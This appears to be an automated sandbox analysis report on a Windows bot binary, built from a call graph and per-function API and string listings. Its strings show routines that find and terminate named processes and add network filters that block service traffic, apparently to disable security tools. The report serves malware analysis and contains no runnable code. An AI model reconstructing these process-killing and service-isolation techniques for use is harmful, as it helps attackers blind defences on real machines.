7ff704896d6f 10197->10198 10199 7ff704896d82 10197->10199 10200 7ff704896d74 10198->10200 10201 7ff704896db5 10198->10201 10202 7ff7048914e2 6 API calls 10199->10202 10203 7ff704896d79 10200->10203 10205 7ff7048914e2 6 API calls 10200->10205 10204 7ff7048914e2 6 API calls 10201->10204 10202->10203 10204->10203 10205->10203 10206 7ff704891d60 10207 7ff704891e23 10206->10207 10208 7ff704891d77 10206->10208 10211 7ff7048914e2 6 API calls 10207->10211 10209 7ff704891d80 OpenProcessToken 10208->10209 10210 7ff704891e53 10208->10210 10213 7ff704891eb8 GetLastError 10209->10213 10214 7ff704891d98 GetTokenInformation 10209->10214 10212 7ff7048914e2 6 API calls 10210->10212 10232 7ff704891e21 10211->10232 10212->10232 10217 7ff7048914e2 6 API calls 10213->10217 10215 7ff704891fcd 10214->10215 10216 7ff704891dce GetLastError 10214->10216 10218 7ff704892090 LocalAlloc 10215->10218 10221 7ff7048920cb 10215->10221 10219 7ff704891de0 10216->10219 10220 7ff704891f67 LocalAlloc 10216->10220 10217->10232 10218->10221 10222 7ff7048920a8 GetLengthSid memcpy 10218->10222 10224 7ff7048914e2 6 API calls 10219->10224 10220->10221 10225 7ff704891f82 GetTokenInformation 10220->10225 10222->10221 10223 7ff7048914e2 6 API calls 10226 7ff704891ead 10223->10226 10227 7ff704891df6 10224->10227 10225->10218 10228 7ff704891fac GetLastError 10225->10228 10229 7ff704891e05 LocalFree 10227->10229 10230 7ff704891e0e CloseHandle 10227->10230 10231 7ff7048914e2 6 API calls 10228->10231 10229->10230 10230->10226 10230->10232 10231->10215 10232->10223 10233 7ff70489c562 10234 7ff70489c566 10233->10234 10238 7ff70489c382 10234->10238 10239 7ff70489b9b0 10234->10239 10236 7ff70489ca67 10237 7ff70489b3e7 fputc 10237->10238 10238->10236 10238->10237 10246 7ff70489ba02 10239->10246 10240 7ff70489bb66 10241 7ff70489bb7f 10240->10241 10244 7ff70489b3e7 fputc 10240->10244 10242 7ff70489bba6 10241->10242 10245 7ff70489b3e7 fputc 10241->10245 10242->10238 10243 7ff70489b3e7 fputc 10243->10246 10244->10240 10245->10241 10246->10240 10246->10243 11406 7ff704892463 11407 7ff704892484 CloseHandle 11406->11407 11426 7ff7048923f0 11407->11426 11408 7ff7048926ed Process32Next 11409 7ff704892704 GetLastError 11408->11409 11408->11426 11409->11426 11410 7ff704892888 CloseHandle 11412 7ff7048928a3 11410->11412 11413 7ff7048921e4 11410->11413 11420 7ff7048914e2 6 API calls 11412->11420 11413->11412 11417 7ff7048921f4 11413->11417 11414 7ff7048914e2 6 API calls 11414->11426 11415 7ff7048924d3 OpenProcess 11418 7ff7048925a3 GetLastError 11415->11418 11419 7ff7048924f4 TerminateProcess 11415->11419 11416 7ff7048924c2 strcmp 11416->11415 11416->11426 11421 7ff7048914e2 6 API calls 11417->11421 11422 7ff7048914e2 6 API calls 11418->11422 11419->11407 11423 7ff70489250a GetLastError 11419->11423 11424 7ff704892211 11420->11424 11421->11424 11422->11426 11425 7ff7048914e2 6 API calls 11423->11425 11425->11426 11426->11407 11426->11408 11426->11410 11426->11414 11426->11415 11426->11416 11427 7ff704893c63 11428 7ff704893cec 11427->11428 11429 7ff704893d7d 11428->11429 11431 7ff704893d02 11428->11431 11430 7ff7048914e2 6 API calls 11429->11430 11432 7ff704893d30 11430->11432 11433 7ff7048914e2 6 API calls 11431->11433 11433->11432 10925 7ff704893b64 10926 7ff704893bc1 10925->10926 10927 7ff704893b8a 10925->10927 10930 7ff7048914e2 6 API calls 10926->10930 10928 7ff704893b8f 10927->10928 10929 7ff704893bec 10927->10929 10944 7ff704893909 10928->10944 10933 7ff7048914e2 6 API calls 10929->10933 10932 7ff704893bb9 10930->10932 10936 7ff704893c3e GetLastError 10932->10936 10938 7ff704893c6a 10932->10938 10933->10932 10935 7ff704893ba2 SetFileAttributesA 10935->10932 10935->10936 10937 7ff7048914e2 6 API calls 10936->10937 10937->10932 10939 7ff704893d7d 10938->10939 10942 7ff704893d02 10938->10942 10940 7ff7048914e2 6 API calls 10939->10940 10941 7ff704893d30 10940->10941 10943 7ff7048914e2 6 API calls 10942->10943 10943->10941 10945 7ff704893921 10944->10945 10946 7ff704893998 10944->10946 10947 7ff7048939d1 10945->10947 10948 7ff70489392a GetFileAttributesA 10945->10948 10949 7ff7048914e2 6 API calls 10946->10949 10950 7ff7048914e2 6 API calls 10947->10950 10951 7ff704893a0a GetLastError 10948->10951 10954 7ff70489393b 10948->10954 10949->10954 10950->10954 10952 7ff7048914e2 6 API calls 10951->10952 10952->10954 10953 7ff7048914e2 6 API calls 10955 7ff704893b5f 10953->10955 10956 7ff704893974 10954->10956 10957 7ff704893b3a 10954->10957 10955->10955 10958 7ff7048914e2 6 API calls 10956->10958 10957->10953 10959 7ff70489398a 10958->10959 10959->10932 10959->10935 10247 7ff70489c958 10248 7ff70489c960 localeconv 10247->10248 10251 7ff70489c382 10247->10251 10249 7ff7048a026c 6 API calls 10248->10249 10249->10251 10250 7ff70489ca67 10251->10250 10252 7ff70489b3e7 fputc 10251->10252 10252->10251 10593 7ff70489de59 10594 7ff70489de6f 10593->10594 10602 7ff70489d9bb 10594->10602 10596 7ff70489e2e0 10597 7ff70489e301 10596->10597 10598 7ff70489ccd9 2 API calls 10596->10598 10598->10597 10599 7ff70489ccd9 fputwc fwprintf 10600 7ff70489db86 10599->10600 10600->10596 10600->10599 10601 7ff70489d1bd fputwc 10600->10601 10601->10600 10603 7ff70489d9cd 10602->10603 10604 7ff70489d00f 6 API calls 10603->10604 10605 7ff70489da05 10604->10605 10606 7ff70489da1a 10605->10606 10607 7ff70489da2c 10605->10607 10608 7ff70489cc00 10 API calls 10606->10608 10609 7ff70489da9d 10607->10609 10612 7ff70489da42 10607->10612 10615 7ff70489da27 10608->10615 10610 7ff70489daa1 10609->10610 10611 7ff70489daa8 strlen 10609->10611 10614 7ff70489d897 9 API calls 10610->10614 10611->10610 10613 7ff70489da4e strlen 10612->10613 10616 7ff70489da46 10612->10616 10613->10616 10614->10615 10615->10600 10617 7ff70489cdd0 9 API calls 10616->10617 10618 7ff70489da81 10617->10618 10618->10615 10619 7ff70489ca90 fputwc 10618->10619 10619->10618 10620 7ff7048a0659 IsDBCSLeadByteEx 10253 7ff70489dd5c 10254 7ff70489dd6e 10253->10254 10262 7ff70489d3c1 10254->10262 10256 7ff70489e2e0 10257 7ff70489e301 10256->10257 10258 7ff70489ccd9 2 API calls 10256->10258 10258->10257 10259 7ff70489ccd9 fputwc fwprintf 10260 7ff70489db86 10259->10260 10260->10256 10260->10259 10261 7ff70489d1bd fputwc 10260->10261 10261->10260 10263 7ff70489d3f3 10262->10263 10264 7ff70489d513 10263->10264 10269 7ff70489ca90 fputwc 10263->10269 10265 7ff70489d593 10264->10265 10266 7ff70489ca90 fputwc 10264->10266 10267 7ff70489d5af 10265->10267 10268 7ff70489ca90 fputwc 10265->10268 10266->10264 10267->10260 10268->10265 10269->10263 11434 7ff70489385c 11435 7ff7048938a9 11434->11435 11436 7ff704893869 11434->11436 11437 7ff7048914e2 6 API calls 11435->11437 11438 7ff704891cf4 8 API calls 11436->11438 11439 7ff7048938ce 11437->11439 11440 7ff704893875 11438->11440 11440->11439 11441 7ff704891c73 8 API calls 11440->11441 11442 7ff704893889 11441->11442 11442->11435 11442->11439 11443 7ff7048938d8 GetLastError 11442->11443 11444 7ff7048914e2 6 API calls 11443->11444 11444->11439 10960 7ff70489475d 10961 7ff704894b28 10960->10961 10962 7ff704894b35 10961->10962 10963 7ff704894b2d fclose 10961->10963 10964 7ff704894ba2 10962->10964 10965 7ff704894b39 10962->10965 10963->10962 10966 7ff7048914e2 6 API calls 10964->10966 10968 7ff7048914e2 6 API calls 10965->10968 10967 7ff704894b78 10966->10967 10968->10967 11472 7ff70489ac96 11473 7ff70489ad13 signal 11472->11473 11475 7ff70489aca1 11472->11475 11474 7ff70489ad25 signal 11473->11474 11473->11475 11474->11475 11476 7ff704897096 11477 7ff7048970b2 strlen 11476->11477 11478 7ff7048970c7 11476->11478 11477->11478 11479 7ff7048a0088 ___lc_codepage_func ___mb_cur_max_func 11480 7ff7048a00b7 11479->11480 11485 7ff7048a00f1 11479->11485 11481 7ff7048a00bc 11480->11481 11482 7ff7048a00c3 11480->11482 11483 7ff70489ffd0 2 API calls 11481->11483 11481->11485 11484 7ff70489ffd0 2 API calls 11482->11484 11482->11485 11483->11481 11484->11482 10621 7ff70489de8a 10623 7ff70489dea6 10621->10623 10622 7ff70489cc00 10 API calls 10630 7ff70489db86 10622->10630 10624 7ff70489df1c 10623->10624 10625 7ff70489df21 10623->10625 10624->10622 10633 7ff70489d5bc 10625->10633 10627 7ff70489e301 10628 7ff70489e2e0 10628->10627 10629 7ff70489ccd9 2 API calls 10628->10629 10629->10627 10630->10628 10631 7ff70489ccd9 fputwc fwprintf 10630->10631 10632 7ff70489d1bd fputwc 10630->10632 10631->10630 10632->10630 10638 7ff70489d5d3 10633->10638 10634 7ff70489d7aa 10637 7ff70489ca90 fputwc 10634->10637 10635 7ff70489d76b 10635->10634 10636 7ff70489ca90 fputwc 10635->10636 10636->10634 10639 7ff70489d7b7 10637->10639 10638->10635 10641 7ff70489ca90 fputwc 10638->10641 10640 7ff70489ca90 fputwc 10639->10640 10642 7ff70489d7c8 10640->10642 10641->10638 10644 7ff70489ca90 fputwc 10642->10644 10647 7ff70489d7ce 10642->10647 10643 7ff70489d815 10645 7ff70489d861 10643->10645 10649 7ff70489ca90 fputwc 10643->10649 10644->10642 10650 7ff70489ca90 fputwc 10645->10650 10646 7ff70489cc72 7 API calls 10646->10647 10647->10643 10647->10646 10648 7ff70489ca90 fputwc 10647->10648 10652 7ff70489ccd9 2 API calls 10647->10652 10648->10647 10649->10643 10651 7ff70489d875 10650->10651 10652->10647 10653 7ff7048a0689 GetProcessHeap 10352 7ff704899181 10363 7ff704898e2e 10352->10363 10353 7ff7048990f2 GetProcessHeap HeapFree 10353->10363 10354 7ff704898da0 10355 7ff704899284 10354->10355 10356 7ff704898da9 FreeLibrary 10354->10356 10356->10355 10357 7ff70489a1f1 11 API calls 10357->10363 10358 7ff704898ecc strlen 10358->10363 10359 7ff704898f64 GetProcessHeap HeapAlloc 10359->10363 10360 7ff704898fb2 BuildTrusteeWithSidW BuildSecurityDescriptorW 10360->10363 10361 7ff7048914e2 6 API calls 10361->10363 10362 7ff70489795a 14 API calls 10362->10363 10363->10353 10363->10354 10363->10357 10363->10358 10363->10359 10363->10360 10363->10361 10363->10362 10364 7ff7048991dc LocalFree 10363->10364 10364->10363

                    Executed Functions

                    Function 00007FF7048945D5 Relevance: 72.0, APIs: 24, Strings: 17, Instructions: 298fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 7ff7048945d5-7ff7048945f1 1 7ff704894687-7ff7048946b5 call 7ff7048914e2 0->1 2 7ff7048945f7-7ff7048945fa 0->2 10 7ff704894b39-7ff704894b4a 1->10 3 7ff704894600-7ff704894604 2->3 4 7ff7048946ba-7ff7048946e8 call 7ff7048914e2 2->4 8 7ff704894610-7ff704894625 fopen 3->8 9 7ff704894606-7ff70489460a 3->9 4->10 13 7ff704894720-7ff704894749 _errno call 7ff7048914e2 _errno 8->13 14 7ff70489462b-7ff704894640 fseek 8->14 9->8 12 7ff7048946ed-7ff70489471b call 7ff7048914e2 9->12 19 7ff704894b53-7ff704894b60 10->19 20 7ff704894b4c 10->20 12->10 29 7ff70489478f-7ff7048947a3 _errno 13->29 30 7ff70489474b-7ff704894758 13->30 17 7ff7048947f3-7ff704894800 call 7ff7048a04e8 14->17 18 7ff704894646-7ff70489466f _errno call 7ff7048914e2 _errno 14->18 32 7ff704894802 17->32 33 7ff70489482b-7ff704894854 _errno call 7ff7048914e2 _errno 17->33 35 7ff704894675-7ff704894682 18->35 36 7ff7048947da-7ff7048947ee _errno 18->36 21 7ff704894b62-7ff704894b73 call 7ff7048914e2 19->21 22 7ff704894b99-7ff704894ba0 19->22 20->19 34 7ff704894b78-7ff704894b8a 21->34 22->21 37 7ff704894b28-7ff704894b2b 29->37 30->29 38 7ff704894b23 32->38 39 7ff704894808-7ff70489480d 32->39 49 7ff704894856-7ff704894863 33->49 50 7ff70489489a-7ff7048948ae _errno 33->50 35->1 36->37 41 7ff704894b35-7ff704894b37 37->41 42 7ff704894b2d-7ff704894b30 fclose 37->42 38->37 43 7ff7048948b3-7ff7048948cb fseek 39->43 44 7ff704894813-7ff704894818 39->44 41->10 46 7ff704894ba2-7ff704894bbb call 7ff7048914e2 41->46 42->41 51 7ff704894941-7ff70489496a _errno call 7ff7048914e2 _errno 43->51 52 7ff7048948cd-7ff7048948d9 43->52 44->43 47 7ff70489481e-7ff704894826 44->47 46->34 47->37 49->50 50->37 61 7ff7048949b0-7ff7048949c4 _errno 51->61 62 7ff70489496c-7ff704894979 51->62 55 7ff7048948df-7ff7048948e5 52->55 56 7ff7048949c9-7ff7048949eb GetProcessHeap HeapAlloc 52->56 59 7ff704894b92-7ff704894b97 55->59 60 7ff7048948eb 55->60 56->55 58 7ff7048949f1-7ff704894a07 call 7ff7048914e2 56->58 58->55 59->37 64 7ff7048948f0-7ff7048948ff 60->64 61->37 62->61 65 7ff704894905-7ff704894907 64->65 66 7ff704894a9e-7ff704894aa7 64->66 65->66 68 7ff70489490d-7ff704894930 fread 65->68 69 7ff704894acf-7ff704894af2 call 7ff7048914e2 66->69 70 7ff704894aa9-7ff704894aab 66->70 68->66 71 7ff704894936 68->71 73 7ff704894aad-7ff704894ab2 69->73 72 7ff704894af4-7ff704894af9 70->72 70->73 75 7ff704894a0c-7ff704894a35 _errno call 7ff7048914e2 _errno 71->75 76 7ff70489493c-7ff70489493f 71->76 79 7ff704894b03-7ff704894b0c 72->79 80 7ff704894afb-7ff704894b01 72->80 73->37 77 7ff704894ab4-7ff704894acd GetProcessHeap HeapFree 73->77 83 7ff704894a37-7ff704894a44 75->83 84 7ff704894a7b-7ff704894a8f _errno 75->84 76->64 77->37 79->80 80->37 83->84 84->64
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: _errno$fclosefflushfopenfseekfwrite
                    • String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
                    • API String ID: 2897271634-4120527733
                    • Opcode ID: 65d4fb601a1f5698292dcdde8469515ec84dc54ab1f3b57c9fb37bd4b7802f35
                    • Instruction ID: 6c83b4b9d03cd313f8ba3bee392ac11ee71ce0aae5944ade28f2ae45826a3e71
                    • Opcode Fuzzy Hash: 65d4fb601a1f5698292dcdde8469515ec84dc54ab1f3b57c9fb37bd4b7802f35
                    • Instruction Fuzzy Hash: 91D14C22A0CA0791FA10BF57AC80B78A751AF54B95FD94931D90D576E0DFBCF8B68320
                    Function 00007FF70489855D Relevance: 31.9, APIs: 10, Strings: 8, Instructions: 393COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: ErrorLast$Process$CloseFullHandleImageNameNextOpenProcess32Querystrcmp
                    • String ID: [E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu)$[E] (%s) -> OpenProcess failed(szExeFile=%s,gle=%lu)$[E] (%s) -> Process32First failed(gle=%lu)$[E] (%s) -> Process32Next failed(gle=%lu)$[E] (%s) -> QueryFullProcessImageNameW failed(gle=%lu)$[I] (%s) -> Done(szExeFile=%s,th32ProcessID=%d)$app$block_app
                    • API String ID: 1025937399-1899507746
                    • Opcode ID: f239fd8f6774d87dc5bfea94598835879428ace1de78577f0772c374105c3bb5
                    • Instruction ID: 6547c004eb5fadaed9d36331df9608014660858c77867320d46a18dbf4167606
                    • Opcode Fuzzy Hash: f239fd8f6774d87dc5bfea94598835879428ace1de78577f0772c374105c3bb5
                    • Instruction Fuzzy Hash: 23F12911F2CA0386FA717E17ACC4B789251AF46358F980C32C64F0A2D5CF6DFDA49626
                    Function 00007FF704891131 Relevance: 13.6, APIs: 9, Instructions: 120sleepstringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: _inittermmalloc$ExceptionFilterSleepUnhandled_amsg_exit_cexitstrlen
                    • String ID:
                    • API String ID: 3714283218-0
                    • Opcode ID: 2813f3856443894ab469f366167a80d9e07d419bf14478a7c388344116e67307
                    • Instruction ID: bb40c3caca037ffa44ae6b5dee335c720c17c23731958e243436f1c69628e783
                    • Opcode Fuzzy Hash: 2813f3856443894ab469f366167a80d9e07d419bf14478a7c388344116e67307
                    • Instruction Fuzzy Hash: CF510826A09A4785FA55BF53ACD4A79A2A0AF44B84F884835C90D477D6EF6CF874C320
                    Function 00007FF704898CFC Relevance: 40.5, APIs: 9, Strings: 14, Instructions: 281memorystringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 85 7ff704898cfc-7ff704898d3f call 7ff704899bb9 88 7ff70489927f 85->88 89 7ff704898d45-7ff704898d47 85->89 90 7ff704899284-7ff704899299 88->90 89->90 91 7ff704898d4d-7ff704898d59 89->91 91->90 92 7ff704898d5f-7ff704898d71 call 7ff704891cf4 91->92 95 7ff704898d91-7ff704898d97 92->95 96 7ff704898d73-7ff704898d7d call 7ff704891c73 92->96 98 7ff704898d9c-7ff704898d9e 95->98 99 7ff704898d82-7ff704898d88 96->99 100 7ff704898da0-7ff704898da3 98->100 101 7ff704898db7-7ff704898dce call 7ff704891c73 98->101 99->98 102 7ff704898d8a-7ff704898d8f 99->102 100->90 103 7ff704898da9-7ff704898db2 FreeLibrary 100->103 106 7ff704898dd4-7ff704898deb call 7ff704891c73 101->106 107 7ff704899257 101->107 102->100 103->90 110 7ff704899261 106->110 111 7ff704898df1-7ff704898e03 call 7ff704891c73 106->111 107->110 113 7ff70489926b 110->113 111->113 115 7ff704898e09-7ff704898e20 call 7ff704891c73 111->115 116 7ff704899275 113->116 115->116 119 7ff704898e26-7ff704898e2c 115->119 116->88 120 7ff704898e76-7ff704898e82 119->120 120->100 121 7ff704898e88-7ff704898e8a 120->121 121->100 122 7ff704898e90-7ff704898eca call 7ff70489a1f1 121->122 125 7ff704898e72 122->125 126 7ff704898ecc-7ff704898f29 strlen 122->126 125->120 128 7ff704898f2f-7ff704898f5e 126->128 129 7ff704898e2e-7ff704898e49 call 7ff7048914e2 126->129 133 7ff704898f64-7ff704898f8d GetProcessHeap HeapAlloc 128->133 134 7ff704898e4b-7ff704898e5e call 7ff7048914e2 128->134 129->125 135 7ff7048990a4-7ff7048990c4 call 7ff7048914e2 133->135 136 7ff704898f93-7ff704898fac 133->136 142 7ff704898e63-7ff704898e6b 134->142 135->142 143 7ff704898fb2-7ff704899067 BuildTrusteeWithSidW BuildSecurityDescriptorW 136->143 144 7ff7048990c9-7ff7048990df call 7ff7048914e2 136->144 142->125 146 7ff7048991a9-7ff7048991da call 7ff70489795a 143->146 147 7ff70489906d-7ff704899086 call 7ff7048914e2 143->147 152 7ff7048990e4-7ff7048990ec 144->152 155 7ff7048991ef-7ff704899200 call 7ff7048914e2 146->155 156 7ff7048991dc-7ff7048991ea LocalFree 146->156 157 7ff70489908c 147->157 158 7ff70489910e-7ff704899114 147->158 152->142 154 7ff7048990f2-7ff704899109 GetProcessHeap HeapFree 152->154 154->142 166 7ff704899205 155->166 156->152 159 7ff70489919f-7ff7048991a4 157->159 160 7ff704899092-7ff70489909f 157->160 161 7ff704899211-7ff704899216 158->161 162 7ff70489911a-7ff704899120 158->162 159->152 160->152 161->152 164 7ff704899122-7ff704899125 162->164 165 7ff704899153-7ff704899159 162->165 167 7ff704899140-7ff704899146 164->167 168 7ff704899127-7ff70489912a 164->168 169 7ff70489915f-7ff704899165 165->169 170 7ff704899239-7ff70489923e 165->170 166->156 173 7ff70489922f-7ff704899234 167->173 174 7ff70489914c-7ff704899151 167->174 171 7ff704899130-7ff704899133 168->171 172 7ff70489921b-7ff704899220 168->172 175 7ff704899243-7ff704899248 169->175 176 7ff70489916b-7ff704899171 169->176 170->152 179 7ff704899225-7ff70489922a 171->179 180 7ff704899139-7ff70489913e 171->180 172->152 173->152 174->152 175->152 177 7ff704899177-7ff70489917c 176->177 178 7ff70489924d-7ff704899252 176->178 177->152 178->152 179->152 180->152
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: Heap$Free$BuildCriticalLibraryProcessSection$AddressAllocCopyDescriptorEnterFileLeaveLoadLocalProcSecurityTrusteeWithfflushfwritestrcmpstrlen
                    • String ID: RtlAnsiStringToUnicodeString$RtlCopyMemory$RtlCreateServiceSid$RtlFreeUnicodeString$RtlZeroMemory$[E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> RtlAnsiStringToUnicodeString failed(res=%08lx)$[E] (%s) -> RtlCreateServiceSid failed(res=%08lx)$[I] (%s) -> Done(svc_name=%s)$block_svc$mem_alloc$ntdll.dll$svc
                    • API String ID: 3039259412-1782951725
                    • Opcode ID: facef552b05594f5c141d541bbb0fca2f992695a7b7a944a785e6a839d7ef5e8
                    • Instruction ID: 5407f3f28965613bc5019b03582a5d4ec8562a78f25aa5cb2a8024169ed56bfb
                    • Opcode Fuzzy Hash: facef552b05594f5c141d541bbb0fca2f992695a7b7a944a785e6a839d7ef5e8
                    • Instruction Fuzzy Hash: E8D17D61A0CA8395FB20AF46ACC0BB9A250BF85344F984835DA4D477D5DF7DF8A9C720
                    Function 00007FF70489795A Relevance: 33.5, APIs: 8, Strings: 11, Instructions: 206memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: FilterFwpmHeap$Add0DeleteKey0Process$AllocFreefflushfwrite
                    • String ID: 3L$;9rJ$TL$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterAdd0(IPv6) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv6) failed(res=%08lx)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$setup_svc_filt
                    • API String ID: 3629392964-1470975255
                    • Opcode ID: 6e65bf72a18d42d1941ba8ddbea28bee3a75f355e7b060a7362c9ecff14a5aea
                    • Instruction ID: e16f23f9e95153ec5b9e0e10014919bae30a5ac1f6ac042b619377e1fcafffb6
                    • Opcode Fuzzy Hash: 6e65bf72a18d42d1941ba8ddbea28bee3a75f355e7b060a7362c9ecff14a5aea
                    • Instruction Fuzzy Hash: 3AA1C32261CBC295E7609F16BC8079AA7A1FF81784F484534EACC47B99EF7DD4A4CB10
                    Function 00007FF70489433B Relevance: 31.6, APIs: 8, Strings: 10, Instructions: 133fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: _errno$fopenfwrite
